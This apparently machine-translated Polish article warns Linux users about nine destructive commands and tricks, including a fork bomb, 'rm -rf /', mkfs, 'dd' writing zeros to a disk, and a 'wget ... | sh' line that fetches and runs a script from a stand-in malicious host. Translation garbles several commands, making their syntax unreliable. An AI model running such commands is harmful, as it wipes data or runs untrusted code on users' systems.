9 poleceń i kodów Linuksa, aby być ostrożnym
Polecenia powłoki / terminala Linux są bardzo potężne a zwykłe polecenie może doprowadzić do usunięcia folderu, plików lub folderu głównego itp.
W niektórych przypadkach Linux nawet nie poprosi Cię o potwierdzenie, ale wykona polecenie od razu, powodując stracić cenne dane i informacje przechowywane w tych plikach i folderach.
Ludzie często publikują treści w sieci zalecanie nowym użytkownikom Linuksa wykonania tych poleceń. Może to wydawać się żartem dla kogoś, kto opublikował treść, ale nie jest to śmiech dla osoby po drugiej stronie.
Zebraliśmy kilka poleceń Linuksa, które są dość szkodliwe dla twojego systemu, aby pomóc Ci ich uniknąć. Pamiętaj, że są one rzeczywiście niebezpieczne i można nawet zmieniać na różne sposoby, aby tworzyć nowe polecenia zadawać więcej obrażeń.
Ważną rzeczą do odnotowania jest to niektóre z tych poleceń są niebezpieczne tylko wtedy, gdy mają prefiks sudo w Ubuntu. Podczas gdy w innych dystrybucjach Linuksa, większość tych poleceń będzie niebezpieczna do wykonania jako root.
Spójrz na 9 poleceń i kodów, których należy unikać.
1. Komenda Bombowa Linuksa
: () : |: & ;:
znany również jako Widelec Bomb to atak typu „odmowa usługi” na system Linux. : () : |: & ;:
jest funkcją bash. Po wykonaniu, powtarza się wiele razy, aż system się zawiesza.
Możesz się go pozbyć tylko poprzez ponowne uruchomienie systemu. Więc bądź ostrożny podczas wykonywania tego polecenia w powłoce Linuksa.
2. Folder mv / dev / null Polecenie
folder mv / dev / null
to kolejne ryzykowne polecenie. Dev / null
lub puste urządzenie
jest plik urządzenia, który odrzuca wszystkie zapisane na nim dane, ale zgłasza, że operacja zapisu została wykonana pomyślnie. Znany jest również jako nieco wygięty lub czarna dziura.
3. Komenda rm -rf
rm -rf
polecenie to szybki sposób usuń folder i jego zawartość w systemie operacyjnym Linux. Jeśli nie wiesz, jak go właściwie używać, może stać się bardzo niebezpieczny dla systemu. Najczęstsze kombinacje i opcje używane z poleceniem rm-rf wymieniono poniżej:
rm
polecenie służy do usuwania plików w systemie Linux.rm -f
polecenie usuwa pliki tylko do odczytu w folderze bez monitowania.rm -r
polecenie usuwa rekurencyjnie zawartość folderu.rm -d
polecenie służy do usunięcia pustego katalogu, ale odmówi usunięcia katalogu, jeśli nie jest pusty.rm -rf /
Polecenie służy do wymuszonego usuwania (usuwa je, nawet jeśli jest zabezpieczone przed zapisem) całej zawartości katalogu głównego i podfolderów.rm -rf *
polecenie służy do wymuszonego usunięcia całej zawartości bieżącego katalogu (katalogu, w którym aktualnie pracujesz) i podfolderów.rm -rf.
polecenie służy do wymuszonego usunięcia całej zawartości bieżącego folderu i podfolderów. Therm -r. [^.] *
można również użyć polecenia.rm -i
polecenie służy do usuwania plików i folderów, ale przed usunięciem pojawi się monit.
4. Komenda mkfs
mkfs
może być niebezpiecznym poleceniem dla systemu opartego na Linuksie, jeśli nie znasz jego celu. Wszystko napisane po mkfs zostanie sformatowane i zastąpione pustym systemem plików Linux.
Wszystkie wymienione poniżej polecenia sformatują dysk twardy i wymagają uprawnień administratora:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
Komenda mkfs.cramfs
zrobi to samo co powyżej, ale nie wymaga uprawnień administratora do wykonania.
5. Tar Bomb
The smoła
polecenie służy do łączenia wielu plików w jeden plik (plik zarchiwizowany) w .smoła format. Za pomocą tego polecenia można utworzyć bombę z archiwum taśm (Tar).
To jest plik archiwum, który eksploduje w tysiące lub miliony plików o nazwach podobnych do istniejących plików w bieżącym katalogu zamiast w nowym katalogu, gdy nie jest rozpakowany.
Możesz uniknąć stania się ofiarą tar bomb regularne tworzenie nowego katalogu ochronnego za każdym razem, gdy otrzymasz plik tar a następnie przeniesienie odebranego pliku tar do tego katalogu przed rozpakowaniem.
Jeśli plik tar jest rzeczywiście bombą tar, możesz po prostu usunąć nowo utworzony katalog, aby się go pozbyć. Innym sposobem uniknięcia wybuchu bomby smolistej jest via -t
opcja wyświetlania całej zawartości pliku tar aby dać ci wyobrażenie o typie zawartości zawartej w pliku tar.
6. Polecenie dd
The dd
polecenie jest używane kopiowanie i konwertowanie partycji dysku twardego. Jednak może okazać się szkodliwe, jeśli określisz niewłaściwe miejsce docelowe.
Komenda może być jedną z następujących:
dd if = / dev / hda z = / dev / hdb
dd if = / dev / hda z = / dev / sdb
dd if = coś z = / dev / hda
dd if = coś z = / dev / sda
Następujące polecenie spowoduje wyzerowanie całego podstawowego dysku twardego: dd if = / dev / zero z = / dev / had
7. Kod skryptu powłoki
Ktoś może cię prześladować dając Ci link do skryptu powłoki i zatwierdzając go do pobrania i wykonania. Skrypt może zawierać złośliwy lub niebezpieczny kod wewnątrz. The format polecenia może wyglądać tak: wget http: // some_malicious_source -O- | sh
. The wget
pobierze skrypt, gdy sh pobierze wykonanie skryptu.
8. Złośliwy kod źródłowy
Ktoś daje ci kod źródłowy i prosi o jego skompilowanie. Kod może wydawać się normalnym kodem, ale w rzeczywistości jakiś złośliwy kod jest ukryty w dużym kodzie źródłowym i może to spowodować uszkodzenie systemu. Aby uniknąć bycia ofiarą tego rodzaju ataku, akceptuj i kompiluj swój kod źródłowy tylko z wiarygodnych źródeł.
9. Bomba dekompresyjna
Otrzymałeś skompresowany plik i zostaniesz poproszony o wyodrębnienie tego pliku, który wygląda na bardzo mały, ale może mieć kilka KB. w rzeczywistości, ten niewielki skompresowany plik zawiera bardzo mocno skompresowane dane.
Po rozpakowaniu pliku wyodrębniane są setki GB danych może wypełnić twój dysk twardy obniżyć wydajność systemu. Aby uniknąć tej sytuacji, zawsze pamiętaj o akceptowaniu danych z wiarygodnych źródeł.